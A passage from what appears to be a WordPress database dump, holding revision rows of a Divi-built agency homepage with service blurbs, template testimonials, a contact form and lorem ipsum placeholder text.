custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 21:47:52','2020-07-04 21:47:52','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(179,1,'2020-07-04 21:48:38','2020-07-04 21:48:38','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"55px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" hover_enabled=\"0\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" animation_duration=\"1200ms\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" 